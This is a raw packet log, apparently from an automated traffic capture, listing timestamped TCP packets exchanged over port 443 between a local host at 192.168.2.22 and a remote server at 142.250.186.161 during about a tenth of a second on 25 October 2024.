Oct 25, 2024 19:51:32.894256115 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.894301891 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.894762039 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.895447969 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.895472050 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.895493031 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.895499945 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.895535946 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.896174908 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.896855116 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.896884918 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.896898031 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.896904945 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.896940947 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.897759914 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.898192883 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.898237944 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.898243904 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.898984909 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.899029016 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.899034977 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.899753094 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.899780989 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.899799109 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.899806023 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.899841070 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.900357008 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.901062965 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.901104927 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.901108980 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.901119947 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.901154995 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.901798010 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.902514935 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.902556896 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.902561903 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.903155088 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.903184891 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.903201103 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.903207064 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.903240919 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.903862953 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.904594898 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.904620886 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.904643059 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.904649019 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.904684067 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.905276060 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.905878067 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.905905008 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.905922890 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.905930042 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.905963898 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.906594038 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.907243967 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.907273054 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.907290936 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.907296896 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.907332897 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.907845974 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.908520937 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.908567905 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.908574104 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.909275055 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.909298897 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.909318924 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.909331083 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.909370899 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.909857988 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.910613060 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.910655022 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.910660982 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.911211967 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.911242008 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.911253929 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.911259890 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.911307096 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.911883116 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.911959887 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.911984921 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.912003994 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.912009954 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.912044048 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.912883043 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.912939072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.912982941 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.912988901 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.913912058 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.913933992 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.913959026 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.913964987 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.914001942 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.914881945 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.914936066 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.914982080 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.914988041 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.915869951 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.915895939 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.915919065 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.915925980 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.915961981 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.916763067 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.916964054 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.917011976 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.917018890 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.917907000 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.917934895 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.917953014 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.917959929 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.917995930 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.918626070 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.918670893 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.918713093 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.918719053 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.919611931 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.919632912 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.919655085 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.919661999 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.919697046 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.920500040 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.920579910 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.920624018 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.920629978 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.921463013 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.921510935 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.921519041 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.922406912 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.922454119 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.922454119 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.922463894 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.922497034 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.922542095 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.923404932 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.923433065 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.923449993 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.923456907 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.923491955 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.924370050 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.924418926 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.924463987 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.924469948 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.925298929 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.925326109 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.925343990 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.925350904 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.925385952 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.926172972 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.926253080 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.926300049 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.926306009 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.927051067 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.927083969 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.927093983 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.927099943 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.927126884 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.927882910 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.927957058 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.928002119 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.928008080 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.928946018 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.928976059 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.928987026 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.928992987 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.929019928 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.929708004 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.929786921 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.929831028 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.929836988 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.930833101 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.930866003 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.930881023 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.930888891 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.930926085 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.931569099 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.931622028 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.931668043 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.931675911 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.932600975 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.932630062 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.932646036 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.932653904 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.932688951 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.933197975 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.933252096 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.933298111 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.933305025 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.934221029 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.934247017 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.934266090 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.934272051 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.934309006 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.934868097 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.934995890 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.935036898 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.935044050 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.935931921 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.935959101 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.935977936 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.935985088 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.936019897 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.936522961 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.936646938 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.936690092 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.936696053 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.937576056 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.937598944 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.937623978 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.937630892 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.937666893 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.938208103 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.938308954 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.938354015 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.938359976 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.939080000 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.939127922 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.939129114 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.939138889 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.939168930 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.940011024 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.940104961 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.940146923 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.940154076 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.940752029 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.940778017 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.940798044 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.940807104 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.940840960 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.941612005 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.941926003 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.941971064 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.941977024 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.942509890 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.942534924 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.942557096 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.942564011 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.942595959 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.943219900 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.943527937 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.943574905 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.943583012 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.944972038 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.944997072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945015907 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.945023060 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945060015 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.945101023 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945164919 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945204020 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.945209980 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945781946 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945806980 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945826054 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.945832014 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.945868015 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.946511030 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.946552038 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.946594954 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.946602106 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.947464943 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.947506905 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.947514057 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.947560072 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.947643042 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.947649002 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.948148966 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.948175907 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.948191881 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.948199034 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.948232889 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.948822021 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.948870897 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.948914051 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.948920012 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.949657917 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.949683905 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.949707031 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.949712992 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.949748993 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.950442076 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.950498104 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.950544119 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.950555086 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.951165915 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.951189995 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.951211929 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.951219082 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.951253891 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.952090025 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.952167034 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.952212095 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.952218056 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.952805042 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.952831030 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.952848911 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.952855110 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.952889919 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.953593969 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.953643084 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.953685045 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.953691006 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.954327106 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.954372883 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.954379082 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955039024 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955061913 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955080032 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.955086946 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955122948 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.955127954 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955854893 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955879927 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955904961 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.955914021 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.955950975 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.956625938 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.956688881 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.956732988 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.956738949 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.957779884 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.957803011 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.957823992 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.957830906 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.957865953 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.958100080 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.958168030 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.958209991 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.958215952 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.958885908 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.958910942 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.958931923 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.958939075 CEST	443	49174	142.250.186.161	192.168.2.22
Oct 25, 2024 19:51:32.958975077 CEST	49174	443	192.168.2.22	142.250.186.161
Oct 25, 2024 19:51:32.959606886 CEST	443	49174	142.250.186.161	192.168.2.22
